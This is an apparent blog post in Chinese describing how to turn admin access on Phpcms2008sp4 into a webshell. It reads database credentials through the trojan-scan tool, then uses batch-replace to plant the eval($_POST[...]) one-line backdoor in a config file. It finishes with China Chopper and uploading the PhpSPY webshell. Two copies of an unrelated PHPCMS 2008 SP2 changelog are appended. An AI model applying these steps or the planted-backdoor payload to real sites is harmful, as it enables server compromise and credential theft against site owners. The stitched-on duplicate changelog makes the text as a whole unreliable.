Phpcms2008sp4管理员提权0day

  PHPCMS 2008系列,最早发布于2008年12月,历经近2年的系统完善,现在已经拥有内容模型、会员、问吧、黄页、分类信息、视频、专题、财务、订单、广告、邮件订阅、短消息、自定义表单、全站搜索等20多个功能模块,内置新闻、图片、下载、信息、产品5大内容模型。Phpcms 2008采用模块化开发,支持内容模型和会员模型,并且可以自定义字段,是深受广大用户喜爱的开源网站内容管理系统软件,目前该软件的最新版本为Phpcms2008sp4,通过对该系统的研究,发现在获取了管理员权限的情况下,通过木马扫描可以快捷的获取Webshell权限。 

1.获取Phpcms版本号
Phpcms2008sp4的默认后台地址是admin.php,输入管理员名称和用户密码即可进入。通过后台首页可以看到phpcms的版本号即“Phpcms2008sp4 20110406”。
在这里插入图片描述

图1 获取phpcms的版本号
2.扫描木马
单击“系统设置”-“系统工具”-“木马扫描”-“扫描木马”,如图2所示,进入木马扫描设置页面。在文件类型中选择php,特征函数使用默认的即可。特征代码使用“dbpw”,然后单击“开始扫描”。
在这里插入图片描述

图2 扫描木马设置
注意:在文件类型中默认增加了JS代码扫描,由于是要提权因此去掉JS文件类型,可加快文件扫描速度。如图3所示,程序开始扫描并提示进度等信息。
在这里插入图片描述

图3 开始扫描程序文件
3.查看扫描结果
Phpcms2008sp4版本中扫描木马模块可以对系统所有存在特征代码的文件进行内容查看,如图4所示,当扫描结束后会将扫描的结果按照列表的方式进行显示。并提示哪些文件包含特征代码。在本例中,可以看到有很多文件,通过该方法可以获取数据库配置文件的信息。
在这里插入图片描述

图4查看扫描结果文件
选中一个需要查看的文件,然后在扫描结果列表中操作中,单击“查看”按钮即可查看相应文件的源代码,如图5所示。通过该方法可以很方面的获取数据库配置文件等信息。
在这里插入图片描述

图5 查看程序源代码
4.获取数据库密码
在本例中选中“include/config.inc.php”,如图6所示,可以直接查看文件代码,如果系统中存在Webshell,那么该方法可以快速获取Webshell的密码。
在这里插入图片描述

图6 获取数据库连接密码
5.修改文件获得Webshell
先从需要替换的文件中,选定一个独立段的注释性文字,例如“//MemCache服务器配置”,然后回到木马扫描结果文件列表中,并选中需要替换的文件,并从单击“批量替换”,接着会出来一个文件替换页面,如图7所示,在替换成文本框中输入“eval($_POST[‘antian365.com’]);”,在“要替换的内容”中输入“/MemCache服务器配置””,单击提交,即可将一句话木马插入到配置文件中。
在这里插入图片描述

图7 插入一句话后门到文件中
6.成功获取Webshell
使用中国菜刀一句话木马管理端,在其中先添加一个shell地址并输入连接密码,然后直接连接Webshell地址,如图8所示,成功获取Webshell。
在这里插入图片描述

图8 成功获取Webshell
7.上传大马
利用中国菜刀将大马PhpSPY上传到服务器上,在浏览器中查看,如图9所示,成功运行。Phpcms2008sp4中还提供了系统的路径等信息,该模块也在系统设置中,单击系统环境检测,如图10所示,即可操作系统类型,网站的真实物理地址等信息,这些信息对于提权来说至关重要。
在这里插入图片描述

图9 成功运行phpspy
在这里插入图片描述

图10 Phpcms2008sp4提供的系统检测信息

PHPCMS 2008 SP2 正式版,本次提供的是GBK版本,如需要UTF8,请点这里:http://www.veryhuo.com/down/html/8389.html PHPCMS 2008 SP2 升级内容: 1、 修正了编辑文章上传图片重复生成图片文件的问题 2、 修正了同一IP 24小时允许的最大上传附件数,超过时,上传图片直接返回错误的路径,uploadfile/ 3、 修正了include/global.func.php thumb 函数问题 4、 修正了整合后,utf8 登陆乱码问题 5、 修正了内容页面分页第一页为空问题 6、 修正了专题多页分页时,导致500错误 7、 修正了在没有开启php缓存时,问吧首页无法缓存问题 8、 "FCKLang 未定义"错误的解决办法问题:属编码问题,在本机使用记事本打开fckeditor\editor\lang\zh-cn.js,不用修改任何内容,重新保存后上传服务器覆盖原文件即可解决。 9、 修正了栏目设置中在 是否添加水印设置无效 10、 修正了上传设置图片选项卡设置图片宽度无效问题 11、 修正了自定义表单 中上传条设置了后缀后,前台显示的还是所有的后缀都是可以的,实际上只有后台设置的后缀是可以上传的。 12、 修正了表单向导SQL报错问题 Parse error: syntax error, unexpected ';' 修改了模板文件/formguide/header.html {php $types = cache_read('search_type.php');} 13、 修正了表单向导在系统没有安装到根目录下时,前台上传文件打开地址路径错误 14、 修正了表单向导前台上传没有格式化上传大小字节数 15、 修正了后台界面框架调用问题 16、 修正了手动更新模板缓存后,等待页面操作成功后自动跳转返回的页面重复,显得很粗糙 17、 修正了自动提取关键词关闭后没有用,照样自动提取问题 18、 修正了表单向导,前台展示链接问题 19、 修正了表单向导,信息无法删除问题 20、 修正了专题暂停无效问题 21、 分类TYPE无法再不同模型下添加相同分类名称 22、 修正了黄页管理公司的问题 只显示前20个公司 23、 当关闭广告模块中的统计广告点击次数功能后,链接地址不正确: 24、 升级后凡是缩略图为连接的,相关地方就会出现 Warning: getimagesize 25、 JS跨站调用后,内容显示链接怎么不对 26、 评论页表情符号和换行问题 27、 碎片bug 权限 等问题 28、 修正了008sp1 整合UC 注册不能送积分 29、 修正了总编没有选择来源的权限 30、 修正了总编没有管理文章评论的权限 31、 修正了专题的动态设置无效的问题 32、 特定环境下验证码不出来问题 33、 广告模块添加flash广告后,修改是没有取值 34、 修正了修改产品信息的时候,同时更新产品的更新时间 35、 修正了分页子标题也解析关联链接 36、 修正了 MySQL Query : INSERT INTO `phpcms_keyword` (`tag`,`usetimes`,`lastusetime`) VALUES('启示','1','1243414371') MySQL Error : Duplicate entry '' for key 2 37、 修正了IE8 下面兼容问题 38、 php 最新版本下出现的问题 程序乱码显示 39、 修正了模块下面的header.tpl.php 头部文件标准需要统一 40、 修正了升级后,修改内容后,原升级地址被修改 41、 直接访问header.tpl.php 暴漏网站安装地址问题 42、 邮件发送在不同环境下,发送失败问题、 43、 修正了水印问题 44、 修正了 广告被屏蔽 把 ads 里面的 clickads.php点击里面带有 ads的问题 45、 修正了文章发表成功后,再修改文章将其选择为待审。提示操作成功。但未成功的问题 46、 修正了 member_cache 表和 member 数据条数不一致的时候,导致全站白屏问题 47、 修正了专题的动态设置无效 设置生成静态为“否”多时候 网站不能以动态模式浏览 48、 修正了专题分类和专题在重新设置模块的“是否生成html”后,需要手动的一个个修改专题,和分类才可以修复链接地址 49、 MySQL Query : UPDATE `phpcms2008_category` SET `pitems`=`pitems` 1 WHERE `catid` IN () MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 1 MySQL Errno : 1064 Message : MySQL Query Error 在未修复栏目前,添加信息出错的问题。--已解决 50、 修正了specail 标签中未增加调用, disabled=0 51、 删除文件:admin/mymap.inc.php 52、 修正了管理组帐号被禁用后,仍然可以访问后台。 53、 商务中心的产品和商机管理等几个页面的"点击"量一直显示为"0" 产品,商机等内容页面的浏览量显示为:"0" 54、 修正了黄页企业页面的联系方式栏目有"传真"和"邮编",但是没有地方填加这两项信息. 55、 修正了添加栏目多的话,程序执行缓慢 56、 内容分页有问题.第一页显示不了; [page]***[/page] 插入这样的分页符,第一页看不到. 57、 更新全文所有无法更新不存在searchid 的文章索引 58、 修正了人才推荐标签的问题 59、 修正了产品排序的问题 60、 新增企业黄页栏目分级浏览 栏目太多问题 61、 新增CNZZ站长统计功能 62、 新增表单向导 统计功能 63、 增加了IE8 下 后台兼容问题
升级内容: 1、修正了编辑文章上传图片重复生成图片文件的问题 2、修正了同一IP24小时允许的最大上传附件数,超过时,上传图片直接返回错误的路径,uploadfile/ 3、修正了include/global.func.phpthumb函数问题 4、修正了整合后,utf8登陆乱码问题 5、修正了内容页面分页第一页为空问题 6、修正了专题多页分页时,导致500错误 7、修正了在没有开启php缓存时,问吧首页无法缓存问题 8、'FCKLang未定义'错误的解决办法问题:属编码问题,在本机使用记事本打开fckeditor\editor\lang\zh-cn.js,不用修改任何内容,重新保存后上传服务器覆盖原文件即可解决。 9、修正了栏目设置中在是否添加水印设置无效 10、修正了上传设置图片选项卡设置图片宽度无效问题 11、修正了自定义表单中上传条设置了后缀后,前台显示的还是所有的后缀都是可以的,实际上只有后台设置的后缀是可以上传的。 12、修正了表单向导SQL报错问题Parseerror:syntaxerror,unexpected';' 修改了模板文件/formguide/header.html{php$types=cache_read('search_type.php');} 13、修正了表单向导在系统没有安装到根目录下时,前台上传文件打开地址路径错误 14、修正了表单向导前台上传没有格式化上传大小字节数 15、修正了后台界面框架调用问题 16、修正了手动更新模板缓存后,等待页面操作成功后自动跳转返回的页面重复,显得很粗糙 17、修正了自动提取关键词关闭后没有用,照样自动提取问题 18、修正了表单向导,前台展示链接问题 19、修正了表单向导,信息无法删除问题 20、修正了专题暂停无效问题 21、分类TYPE无法再不同模型下添加相同分类名称 22、修正了黄页管理公司的问题只显示前20个公司 23、当关闭广告模块中的统计广告点击次数功能后,链接地址不正确: 24、升级后凡是缩略图为连接的,相关地方就会出现Warning:getimagesize 25、JS跨站调用后,内容显示链接怎么不对 26、评论页表情符号和换行问题 27、碎片bug权限等问题 28、修正了008sp1整合UC注册不能送积分 29、修正了总编没有选择来源的权限 30、修正了总编没有管理文章评论的权限 31、修正了专题的动态设置无效的问题 32、特定环境下验证码不出来问题 33、广告模块添加flash广告后,修改是没有取值 34、修正了修改产品信息的时候,同时更新产品的更新时间 35、修正了分页子标题也解析关联链接 36、修正了MySQLQuery:INSERTINTO`phpcms_keyword`(`tag`,`usetimes`,`lastusetime`)VALUES('启示','1','1243414371') MySQLError:Duplicateentry''forkey2 37、修正了IE8下面兼容问题 38、php最新版本下出现的问题程序乱码显示 39、修正了模块下面的header.tpl.php头部文件标准需要统一 40、修正了升级后,修改内容后,原升级地址被修改 41、直接访问header.tpl.php暴漏网站安装地址问题 42、邮件发送在不同环境下,发送失败问题、 43、修正了水印问题 44、修正了广告被屏蔽把ads里面的clickads.php点击里面带有ads的问题 45、修正了文章发表成功后,再修改文章将其选择为待审。提示操作成功。但未成功的问题 46、修正了member_cache表和member数据条数不一致的时候,导致全站白屏问题 47、修正了专题的动态设置无效设置生成静态为“否”多时候网站不能以动态模式浏览 48、修正了专题分类和专题在重新设置模块的“是否生成html”后,需要手动的一个个修改专题,和分类才可以修复链接地址 49、MySQLQuery:UPDATE`phpcms2008_category`SET`pitems`=`pitems`+1WHERE`catid`IN() MySQLError:YouhaveanerrorinyourSQLsyntax;checkthemanualthatcorrespondstoyourMySQLserverversionfortherightsyntaxtousenear')'atline1 MySQLErrno:1064 Message:MySQLQueryError 在未修复栏目前,添加信息出错的问题。--已解决 50、修正了specail标签中未增加调用,disabled=0 51、删除文件:admin/mymap.inc.php 52、修正了管理组帐号被禁用后,仍然可以访
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我是simeon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值